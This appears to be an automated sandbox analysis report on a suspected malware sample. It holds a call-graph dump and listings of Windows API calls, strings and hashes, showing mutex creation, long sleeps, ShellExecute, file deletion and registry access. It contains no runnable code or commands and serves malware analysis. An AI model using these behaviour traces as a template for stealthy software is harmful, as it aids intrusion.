4c7aa2 121080->121091 121092 4c7c62 121080->121092 121093 4c7c79 121080->121093 121094 4c7ab9 121080->121094 121095 4c7c35 121080->121095 121096 4c7b75 121080->121096 121097 4c7c70 121080->121097 121099 4c7bdd 121080->121099 121111 4c7c88 121080->121111 121114 4c79ad 121080->121114 121119 4c7ac7 121080->121119 121120 4c7b34 121080->121120 121082 4c7998 121082->121061 121082->121079 121082->121080 121082->121114 121169 4cc6dd 57 API calls ctype 121083->121169 121176 4cc6dd 57 API calls ctype 121084->121176 121116 4c69ad 58 API calls 121085->121116 121175 4cb10f 57 API calls ctype 121086->121175 121177 4cb10f 57 API calls ctype 121087->121177 121179 4d43cc RtlLeaveCriticalSection 121088->121179 121100 4c69ad 58 API calls 121089->121100 121178 4cb10f 57 API calls ctype 121090->121178 121105 4c69ad 58 API calls 121091->121105 121108 4c69ad 58 API calls 121092->121108 121110 4c69ad 58 API calls 121093->121110 121106 4c69ad 58 API calls 121094->121106 121115 4c69ad 58 API calls 121095->121115 121112 4c69ad 58 API calls 121096->121112 121109 4c69ad 58 API calls 121097->121109 121125 4c6914 23 API calls 121099->121125 121113 4c7bf3 121100->121113 121105->121061 121106->121114 121108->121061 121109->121061 121110->121099 121111->121061 121117 4c69ad 58 API calls 121111->121117 121112->121061 121118 4c69ad 58 API calls 121113->121118 121154 4746d8 121114->121154 121115->121061 121116->121099 121117->121099 121118->121099 121170 4c69d4 121119->121170 121174 4cc770 58 API calls 2 library calls 121120->121174 121123 4c7af3 ctype 121173 4c7082 58 API calls 2 library calls 121123->121173 121125->121061 121128 4d0820 121127->121128 121129 4c95b9 IsWindowEnabled 121128->121129 121130 4d0830 121129->121130 121132 4c728c 2 API calls 121130->121132 121131 4d0848 121131->121051 121132->121131 122778 4c8607 121133->122778 121137 4d0729 PostMessageA 121137->121051 121138 4d06f6 121138->121137 121140 4c6914 23 API calls 121139->121140 121141 4d02a6 121140->121141 121142 4d02c1 
121141->121142 121143 4d02c6 PostMessageA 121141->121143 121142->121051 121143->121142 121145 4d4878 ctype 21 API calls 121144->121145 121146 4c6926 121145->121146 121148 4c728c 2 API calls 121146->121148 121147 4c6939 121147->121051 121148->121147 121150 4c72bb CallWindowProcA 121149->121150 121152 4c7299 121149->121152 121151 4c72ce 121150->121151 121151->121052 121152->121150 121153 4c72a7 NtdllDefWindowProc_A 121152->121153 121153->121151 121155 4746e2 __EH_prolog 121154->121155 121180 47eaa1 121155->121180 121159 474710 121255 46e6b9 711 API calls 2 library calls 121159->121255 121161 47471b IsWindow 121163 474737 SendMessageA 121161->121163 121164 474746 ctype 121161->121164 121163->121164 121164->121061 121165->121070 121166->121082 121167->121061 121168->121082 121169->121061 121171 4c693b ctype 57 API calls 121170->121171 121172 4c69db ctype 121171->121172 121172->121123 121173->121120 121174->121061 121175->121061 121176->121061 121177->121061 121178->121099 121179->121114 121181 47eaab __EH_prolog 121180->121181 121256 46e8b0 121181->121256 121183 47ead4 __startOneArgErrorHandling 121184 47ee0d 121183->121184 121267 46ddd7 121183->121267 121187 4c2c3a 62 API calls 121184->121187 121189 47ee59 121187->121189 121191 47a66e 145 API calls 121189->121191 121192 47ee74 121191->121192 121194 4c5eaa ctype 32 API calls 121192->121194 121196 4746fe 121194->121196 121254 416a2f 43 API calls 2 library calls 121196->121254 121254->121159 121255->121161 121257 46e8c2 121256->121257 121266 46e980 121256->121266 121540 481830 121257->121540 121259 4815f0 141 API calls 121260 46e93a 121259->121260 121260->121259 121262 46e962 121260->121262 121546 481930 121260->121546 121263 4815f0 141 API calls 121262->121263 121264 46e96d 121263->121264 121265 481930 141 API calls 121264->121265 121265->121266 121266->121183 121268 481830 141 API calls 121267->121268 121269 46ddf0 121268->121269 121270 46de38 121269->121270 121272 4815f0 141 API calls 121269->121272 121275 481930 141 
API calls 121269->121275 121271 4815f0 141 API calls 121270->121271 121273 46de45 121271->121273 121272->121269 121274 481930 141 API calls 121273->121274 121276 46de5c 121274->121276 121275->121269 121277 4c5eaa ctype 32 API calls 121276->121277 121278 46de67 121277->121278 121279 47efc7 121278->121279 121280 47efd1 __EH_prolog 121279->121280 121281 4c5c1f ctype 36 API calls 121280->121281 121282 47eff9 121281->121282 121283 4c5f18 ctype 67 API calls 121282->121283 121284 47f00e 121283->121284 121604 478d21 121284->121604 121287 4c5f18 ctype 67 API calls 121288 47f033 121287->121288 121289 478ba6 48 API calls 121288->121289 121290 47f044 121289->121290 121291 4c5f18 ctype 67 API calls 121290->121291 121292 47f058 121291->121292 121657 473b88 121292->121657 121541 481849 121540->121541 121542 481843 121540->121542 121550 48cfc0 121541->121550 121557 489da0 141 API calls ctype 121542->121557 121547 481940 121546->121547 121582 48a9b0 121547->121582 121549 481952 121549->121260 121558 48dd50 121550->121558 121552 48cfd3 ctype 121570 48d020 121552->121570 121557->121541 121559 48dd9c 121558->121559 121560 48dd5f 121558->121560 121561 48dda1 121559->121561 121562 48ddb5 121559->121562 121563 48dd6b GetProcessHeap RtlFreeHeap 121560->121563 121567 48dd7d 121560->121567 121579 482a80 141 API calls ctype 121561->121579 121565 48ddce GetProcessHeap RtlReAllocateHeap 121562->121565 121566 48ddbe GetProcessHeap RtlAllocateHeap 121562->121566 121563->121567 121568 48ddde 121565->121568 121566->121568 121567->121552 121568->121567 121580 488da0 33 API calls ctype 121568->121580 121571 48dd50 ctype 141 API calls 121570->121571 121572 48d003 121571->121572 121573 48d080 121572->121573 121574 48d098 121573->121574 121575 48d0a3 121573->121575 121581 482a80 141 API calls ctype 121574->121581 121577 48dd50 ctype 141 API calls 121575->121577 121578 48185f 121575->121578 121577->121578 121578->121260 121579->121567 121581->121575 121588 48a9c5 ctype 121582->121588 121584 48aa07 
121584->121549 121586 48aa70 121601 48aa90 141 API calls ctype 121586->121601 121587 48aa5c 121600 482a80 141 API calls ctype 121587->121600 121588->121584 121588->121586 121588->121587 121593 48d2c0 121588->121593 121599 482870 141 API calls ctype 121588->121599 121591 48aa82 121591->121549 121592 48aa67 121592->121549 121596 48d2d1 ctype 121593->121596 121594 48d318 121594->121588 121595 48d30d 121603 48d320 141 API calls ctype 121595->121603 121596->121594 121596->121595 121602 482a80 141 API calls ctype 121596->121602 121599->121588 121600->121592 121601->121591 121602->121595 121603->121594 121605 478d2b __EH_prolog 121604->121605 121606 4c5c1f ctype 36 API calls 121605->121606 121607 478d4c 121606->121607 121692 478cd2 121607->121692 121610 478d9a 121611 4c5fe3 ctype 35 API calls 121610->121611 121613 478daa 121610->121613 121611->121613 121612 4c512e ctype 29 API calls 121614 478d62 121612->121614 121698 4af56e 121613->121698 121616 478d75 121614->121616 121707 4788b3 35 API calls 2 library calls 121614->121707 121620 4c5fe3 ctype 35 API calls 121616->121620 121617 478db7 121619 478ea8 121617->121619 121621 478de1 121617->121621 121709 4c2dd9 121617->121709 121622 4c5eaa ctype 32 API calls 121619->121622 121623 478d8b 121620->121623 121626 4c5f18 ctype 67 API calls 121621->121626 121625 478eb3 121622->121625 121708 4c4661 29 API calls ctype 121623->121708 121629 4c5eaa ctype 32 API calls 121625->121629 121632 478dee 121626->121632 121628 478dcd 121716 4c2ce2 121628->121716 121631 478ebf 121629->121631 121631->121287 121633 478e3a 121632->121633 121634 478e01 121632->121634 121722 4b05e8 29 API calls 2 library calls 121633->121722 121721 4c637f 29 API calls ctype 121634->121721 121639 478e4a 121641 4c6033 ctype 35 API calls 121639->121641 121640 478e0d 121642 478e38 121640->121642 121645 4c281a ctype 37 API calls 121640->121645 121643 478e5c 121641->121643 121644 478e9c 121642->121644 121647 4c5c1f ctype 36 API calls 121642->121647 121723 4c63cc 
                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(0000001C,?), ref: 0049E9B0
                                                                                                                • lstrcat.KERNEL32(?,00510870), ref: 0049EA24
                                                                                                                • lstrcpy.KERNEL32(0000075E,?), ref: 0049EA7D
                                                                                                                • CharNextA.USER32(?), ref: 0049EA9A
                                                                                                                • lstrcpy.KERNEL32(?,?), ref: 0049EAB1
                                                                                                                • lstrcpy.KERNEL32(?,?), ref: 0049EAE0
                                                                                                                • lstrcat.KERNEL32(0000075E,?), ref: 0049EAF0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrcpy$lstrcat$CharNextValue
                                                                                                                • String ID: 1
                                                                                                                • API String ID: 89198350-2212294583
                                                                                                                • Opcode ID: ad68a6ee470f24b43202929697fe6708f043ebdbb7c53b38e45a62e054b4148b
                                                                                                                • Instruction ID: ac321c7f4d244bd38f1624eaa5a46420c787ebbff42c379b791db125affa82a7
                                                                                                                • Opcode Fuzzy Hash: ad68a6ee470f24b43202929697fe6708f043ebdbb7c53b38e45a62e054b4148b
                                                                                                                • Instruction Fuzzy Hash: B672E2716003459BEB30DB65DC81FEBB7E8AB94304F04493EE549C7282E779E909CB5A

                                                                                                                APIs
                                                                                                                • GetFileAttributesA.KERNEL32(00000000,00000000,1001C05C,1001C030), ref: 10003C2E
                                                                                                                • Sleep.KERNEL32(00057E40), ref: 10003C5F
                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 10003C70
                                                                                                                • GetLastError.KERNEL32 ref: 10003C78
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 10003CA4
                                                                                                                • DeleteFileA.KERNEL32(00000000,?,00000000,00000001,000000FF,000000F0,00004000,00000001,00000000,00000000,?,?,00000000), ref: 10004104
                                                                                                                • RemoveDirectoryA.KERNEL32(00000000,?,?,00000000,?,?,?,?,1001C05C,1001C030), ref: 1000410B
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 10003C86
                                                                                                                  • Part of subcall function 1000BEE1: _free.LIBCMT ref: 1000BEF4
                                                                                                                • _strrchr.LIBCMT ref: 10003EA1
                                                                                                                • GetFileAttributesA.KERNEL32(00000000,?,?,00000000,?,?,?,?,1001C05C,1001C030), ref: 10003EBD
                                                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,1001C05C,1001C030), ref: 10003ECB
                                                                                                                • _strrchr.LIBCMT ref: 10003FDC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3352388124.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_10001000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$AttributesCloseCreateDirectoryHandle_strrchr$DeleteErrorLastMutexRemoveSleep_free
                                                                                                                • String ID: 6A2V
                                                                                                                • API String ID: 2466807127-3928244006
                                                                                                                • Opcode ID: 9073780255d0488a3a7c38908a7e10ec266a7cacfbcac4d5d6845679b204dff9
                                                                                                                • Instruction ID: 4ffcfcd5c6023365c1a35ea2a6b59db73bd97b154c4638eeb213454f61270c67
                                                                                                                • Opcode Fuzzy Hash: 9073780255d0488a3a7c38908a7e10ec266a7cacfbcac4d5d6845679b204dff9
                                                                                                                • Instruction Fuzzy Hash: FF62C1B4E057688ADB60CF18CD81B99BBB0EF4A258F0041D9D90DA7751DB3A6EC1CF49

                                                                                                                APIs
                                                                                                                • RegCreateKeyExA.KERNEL32(80000002,?,00000000,00000000,00000000,00020119,00000000,?,00000000), ref: 100058CC
                                                                                                                • RegGetValueA.KERNEL32(?,00000000,?,0000FFFF,00000000,?,00000040), ref: 100058FB
                                                                                                                • RegCloseKey.KERNEL32(?), ref: 1000590F
                                                                                                                • Sleep.KERNEL32(-005B8D80), ref: 10005B40
                                                                                                                • GetProcessHeap.KERNEL32(?,00000001,00000000,00000000), ref: 10005C2C
                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 10005C3B
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 10005FE8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3352388124.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_10001000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHeap$CreateFreeProcessSleepValue
                                                                                                                • String ID: 6A2V$}~
                                                                                                                • API String ID: 2565084367-3426175415
                                                                                                                • Opcode ID: 3beda633d26263a205b88fb76175c98f7081ef39fb3af6eb8c07f6e6ec06a78a
                                                                                                                • Instruction ID: 277c2c45b5104139fb1932c0574cf7f95af251a2d1ca7239647193d97ff7ced0
                                                                                                                • Opcode Fuzzy Hash: 3beda633d26263a205b88fb76175c98f7081ef39fb3af6eb8c07f6e6ec06a78a
                                                                                                                • Instruction Fuzzy Hash: B2529BB4D0526C8BDBA6CF18C9957D9BBB8AF48740F1041E9D80CA6251DB316FC1CFA9
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004C5A38
                                                                                                                • GetFullPathNameA.KERNEL32(?,00000104,?,?,?), ref: 004C5A56
                                                                                                                • lstrcpyn.KERNEL32(?,?,00000104), ref: 004C5A65
                                                                                                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,?), ref: 004C5A99
                                                                                                                • CharUpperA.USER32(?), ref: 004C5AAA
                                                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 004C5AC0
                                                                                                                • FindClose.KERNEL32(00000000), ref: 004C5ACC
                                                                                                                • lstrcpy.KERNEL32(?,?), ref: 004C5ADC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$CharCloseFileFirstFullH_prologInformationNamePathUpperVolumelstrcpylstrcpyn
                                                                                                                • String ID:
                                                                                                                • API String ID: 304730633-0
                                                                                                                • Opcode ID: 705ccb979bf7bfab31dbd8d4151a1215a7be151f2ed41621d05fe21e2148c4c4
                                                                                                                • Instruction ID: f1fb7a23f118810a01444a388ea8ec21bf488214b9b25d62a25a9f5e72461a54
                                                                                                                • Opcode Fuzzy Hash: 705ccb979bf7bfab31dbd8d4151a1215a7be151f2ed41621d05fe21e2148c4c4
                                                                                                                • Instruction Fuzzy Hash: FB217C71500059ABCB10DF66DC88EEF7FBCEF157A0F00822AF815D61A1D7749A45CBA8
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004B62F4: RtlInitializeCriticalSection.NTDLL(00000000), ref: 004B6331
                                                                                                                  • Part of subcall function 004B62F4: RtlEnterCriticalSection.NTDLL(00000010), ref: 004B634C
                                                                                                                  • Part of subcall function 004B6355: RtlLeaveCriticalSection.NTDLL ref: 004B6362
                                                                                                                • GetTimeZoneInformation.KERNEL32(0000000C,?,?,?,0000000B,0000000B,?,004B966F,004BAE64,?,?,?,?,004B2098,00000000,?), ref: 004B96CC
                                                                                                                • WideCharToMultiByte.KERNEL32(00000220,Eastern Standard Time,000000FF,0000003F,00000000,?,?,004B966F,004BAE64,?,?,?,?,004B2098,00000000,?), ref: 004B9762
                                                                                                                • WideCharToMultiByte.KERNEL32(00000220,Eastern Summer Time,000000FF,0000003F,00000000,?,?,004B966F,004BAE64,?,?,?,?,004B2098,00000000,?), ref: 004B979B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$ByteCharMultiWide$EnterInformationInitializeLeaveTimeZone
                                                                                                                • String ID: Eastern Standard Time$Eastern Summer Time$T)R
                                                                                                                • API String ID: 3442286286-916455801
                                                                                                                • Opcode ID: 183c54108d68b0f6ec17657df8a831e903b5028ee3689820bf372e9cb9401cc9
                                                                                                                • Instruction ID: 296538d698a59c5eda49d32dad23ace4f3358159aebf9b8f73aaf73d7ae48b13
                                                                                                                • Opcode Fuzzy Hash: 183c54108d68b0f6ec17657df8a831e903b5028ee3689820bf372e9cb9401cc9
                                                                                                                • Instruction Fuzzy Hash: 3F614675515244AAD735AF29EC81BA63FE8BF23314F24002FE544862A1D7384DCBE76D
                                                                                                                APIs
                                                                                                                  • Part of subcall function 10002990: CloseHandle.KERNEL32(00000000,00000000,?,00000002,00000000,00000000), ref: 100029D6
                                                                                                                • ShellExecuteA.SHELL32(00000000,1001C228,?,?,00000000,00000000), ref: 10001D34
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3352388124.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_10001000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseExecuteHandleShell
                                                                                                                • String ID: 6A2V$<sK
                                                                                                                • API String ID: 283469938-3337307597
                                                                                                                • Opcode ID: 3d61d790cbad164f5132db8f129e2413aab9d790ea353cda8f0d62662f8f26e5
                                                                                                                • Instruction ID: 5fb5078009f1e85b9e10a7122cf3cdb11c80ac6edd95854362f6ce01dcf84b75
                                                                                                                • Opcode Fuzzy Hash: 3d61d790cbad164f5132db8f129e2413aab9d790ea353cda8f0d62662f8f26e5
                                                                                                                • Instruction Fuzzy Hash: 93622DB4D05AA88EDB68CF18DD917EEBBB0AF48216F1051DA998DA7351DB305FC18F04
                                                                                                                APIs
                                                                                                                  • Part of subcall function 10002990: CloseHandle.KERNEL32(00000000,00000000,?,00000002,00000000,00000000), ref: 100029D6
                                                                                                                • ShellExecuteA.SHELL32(00000000,1001C228,?,?,00000000,00000000), ref: 100028C8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3352388124.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: CloseExecuteHandleShell
                                                                                                                • String ID: 6A2V$pq""
                                                                                                                APIs
                                                                                                                • FindFirstFileA.KERNEL32(?,00000000,00000000,00000000,00008CFC), ref: 004A1C9C
                                                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 004A1CAB
                                                                                                                • FindClose.KERNEL32(00000000), ref: 004A1D40
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: Find$FileFirst$Close
                                                                                                                • String ID:
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004C78B6
                                                                                                                • GetVersion.KERNEL32(00000007,?,?,00000000,00000000,?,0000C000,00000000,00000000,00000007), ref: 004C7A69
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: H_prologVersion
                                                                                                                • String ID:
                                                                                                                APIs
                                                                                                                • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 004C72B3
                                                                                                                • CallWindowProcA.USER32(?,?,?,?,?), ref: 004C72C8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: Window$CallNtdllProcProc_
                                                                                                                • String ID:
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00476EDB
                                                                                                                  • Part of subcall function 00473C2E: __EH_prolog.LIBCMT ref: 00473C33
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                  • Part of subcall function 00473B88: __EH_prolog.LIBCMT ref: 00473B8D
                                                                                                                  • Part of subcall function 00477FDD: __EH_prolog.LIBCMT ref: 00477FE2
                                                                                                                  • Part of subcall function 00478D21: __EH_prolog.LIBCMT ref: 00478D26
                                                                                                                  • Part of subcall function 00478BA6: __EH_prolog.LIBCMT ref: 00478BAB
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                  • Part of subcall function 004C5FE3: InterlockedIncrement.KERNEL32(-000000F4), ref: 004C6026
                                                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0047764C
                                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104,?,%SystemFolder%,?,?,%SystemFolder%,?,?,?,00000000,00510870,?,?,?,SHF_COMMONFILES), ref: 004776EF
                                                                                                                • GetTempPathA.KERNEL32(00000104,?,00000000,?,%WindowsFolder%,?,?,%WindowsFolder%,?,?,%WindowsFolder%,?,?,?,00000000,00523A30), ref: 0047780F
                                                                                                                  • Part of subcall function 004C6033: lstrlen.KERNEL32(?,?,00000000,004C5E52,005247C8,00403DCA,00000000,00403C1B,00000000,00000000,004019FC,?), ref: 004C6044
                                                                                                                  • Part of subcall function 004123AC: __EH_prolog.LIBCMT ref: 004123B1
                                                                                                                  • Part of subcall function 004123AC: GetVersionExA.KERNEL32(?,Unknown OS), ref: 0041241A
                                                                                                                  • Part of subcall function 00403AF0: __EH_prolog.LIBCMT ref: 00403AF5
                                                                                                                  • Part of subcall function 00403E6D: __EH_prolog.LIBCMT ref: 00403E72
                                                                                                                  • Part of subcall function 0040414B: __EH_prolog.LIBCMT ref: 00404150
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$Interlocked$DirectoryIncrementlstrlen$DecrementPathSystemTempVersionWindows
                                                                                                                • String ID: %ApplicationDataFolder%$%ApplicationDataFolderCommon%$%CommonDocumentsFolder%$%CommonFilesFolder%$%CommonFilesFolder64%$%DAOPath%$%DesktopFolder%$%DesktopFolderCommon%$%FontsFolder%$%MyDocumentsFolder%$%MyMusicFolder%$%MyMusicFolderCommon%$%MyPicturesFolder%$%MyPicturesFolderCommon%$%MyVideosFolder%$%MyVideosFolderCommon%$%ProgramFilesFolder%$%ProgramFilesFolder64%$%RegOrganization%$%RegOwner%$%SourceFolder%$%StartFolder%$%StartFolderCommon%$%StartProgramsFolder%$%StartProgramsFolderCommon%$%StartupFolder%$%StartupFolderCommon%$%SystemDrive%$%SystemFolder%$%TempFolder%$%TempLaunchFolder%$%WindowsFolder%$+$0:R$0:R$;?;?.lua$LUA_PATH$LocalMachine$RegisteredOrganization$RegisteredOwner$SHF_APPLICATIONDATA$SHF_APPLICATIONDATA_COMMON$SHF_COMMONFILES$SHF_COMMON_DOCUMENTS$SHF_DESKTOP$SHF_DESKTOP_COMMON$SHF_FONTS$SHF_MYDOCUMENTS$SHF_MYMUSIC$SHF_MYMUSIC_COMMON$SHF_MYPICTURES$SHF_MYPICTURES_COMMON$SHF_MYVIDEOS$SHF_MYVIDEOS_COMMON$SHF_PROGRAMFILES$SHF_STARTMENU$SHF_STARTMENUPROGRAMS$SHF_STARTMENUPROGRAMS_COMMON$SHF_STARTMENU_COMMON$SHF_STARTUP$SHF_STARTUP_COMMON$Software\Microsoft\Windows NT\CurrentVersion$Software\Microsoft\Windows\CurrentVersion$TU30$_DesktopFolder$_DesktopFolderCommon$_IR_ProductID$_ProgramFilesFolder$_ProgramFilesFolder64$_SystemFolder$_TempFolder$_TempLaunchFolder$_WindowsFolder

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(0000001C,?,?,?,00000000), ref: 0049BF30
                                                                                                                • lstrlen.KERNEL32(?,?,00000000), ref: 0049BF6A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Valuelstrlen
                                                                                                                • String ID: %02ld$*.*
                                                                                                                • API String ID: 799288031-1307316557
                                                                                                                • Opcode ID: 8ed11d18685dcf33048ac6650db020507c19ef213b46d08b148489560b746fec
                                                                                                                • Instruction ID: 4d22c4ef6a11e428898ada22df9821126b6f08c575dc9fd769d40b18eaac3224
                                                                                                                • Opcode Fuzzy Hash: 8ed11d18685dcf33048ac6650db020507c19ef213b46d08b148489560b746fec
                                                                                                                • Instruction Fuzzy Hash: D932A1716043429BDB20DF64DCC4FAB7BA9AF95704F00493EF94497242E778E905CBAA

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00479237
                                                                                                                • 6FAA1CD0.COMCTL32(00523A30), ref: 00479292
                                                                                                                • CoInitialize.OLE32(00000000), ref: 00479299
                                                                                                                  • Part of subcall function 0049A3D0: TlsAlloc.KERNEL32(004792A7,?), ref: 0049A3D9
                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,ERROR: Failed to initialize unzip library.,00000000,00000000,?), ref: 004792D9
                                                                                                                  • Part of subcall function 0049A520: GlobalAlloc.KERNEL32(00000040,000095B6,7556DF20,00000000,0049D7C5), ref: 0049A534
                                                                                                                  • Part of subcall function 0049A520: TlsSetValue.KERNEL32(0000001C,00000000), ref: 0049A547
                                                                                                                  • Part of subcall function 0047A22E: __EH_prolog.LIBCMT ref: 0047A233
